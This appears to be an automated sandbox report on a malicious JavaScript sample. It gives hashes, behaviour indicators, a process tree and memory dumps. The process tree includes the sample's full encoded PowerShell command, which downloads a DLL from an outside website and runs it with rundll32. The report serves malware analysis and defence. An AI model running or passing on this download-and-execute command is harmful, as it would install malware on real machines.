c7246f2f802c8d017fdc1efbc6fb845d7175854140cd055c859e9e5da0cc33fe

Analysis

max time kernel
30s
max time network
33s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
14/03/2023, 15:12

Target

run.js
Size

42KB
MD5

213faecc641aad1a2b64714054adb61d
SHA1

6f293b7c46ea6d1419172378903661502c37982c
SHA256

c7246f2f802c8d017fdc1efbc6fb845d7175854140cd055c859e9e5da0cc33fe
SHA512

2fe498e54599a8c79f91e1e99a6ed7181e2cabdf46f7a32de2d2caf267c2a2af33d3007b84b043a43228f1130efd42e0852177835d333ffc2a954d38c4bf9362
SSDEEP

768:ID2IHpyO0kefdnhYnLg+iLcQpHPGLP4ay4d4Sw8nnsW1DADlyP9w0eyDtHSSp:ID2IHpyO0kefcg+ipPSustHSSp

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2004	powershell.exe
2004	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2004	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2040 wrote to memory of 2004	2040	wscript.exe	28
PID 2040 wrote to memory of 2004	2040	wscript.exe	28
PID 2040 wrote to memory of 2004	2040	wscript.exe	28
PID 2004 wrote to memory of 1324	2004	powershell.exe	30
PID 2004 wrote to memory of 1324	2004	powershell.exe	30
PID 2004 wrote to memory of 1324	2004	powershell.exe	30

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\run.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAcwA6AC8ALwBpAHMAaABhAHMAbgBhAGMAawBzAC4AYwBvAG0ALwBzAEUAUgAvAHQAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAGMAaABvAG4AZAByAG8AcwBhAHIAYwBvAG0AYQB0AG8AdQBzAFIAZQBmAG8AcgBtAGEAYgBsAGUALgBkAGwAbAA7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABjAGgAbwBuAGQAcgBvAHMAYQByAGMAbwBtAGEAdABvAHUAcwBSAGUAZgBvAHIAbQBhAGIAbABlAC4AZABsAGwALABYAFMAOAA4ADsA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2004
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\\chondrosarcomatousReformable.dll XS88
    3⤵
    PID:1324

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/2004-58-0x000000001B0F0000-0x000000001B3D2000-memory.dmp

Filesize
2.9MB

Download
memory/2004-59-0x0000000002230000-0x0000000002238000-memory.dmp

Filesize
32KB

Download
memory/2004-60-0x0000000002570000-0x00000000025F0000-memory.dmp

Filesize
512KB

Download
memory/2004-61-0x0000000002570000-0x00000000025F0000-memory.dmp

Filesize
512KB

Download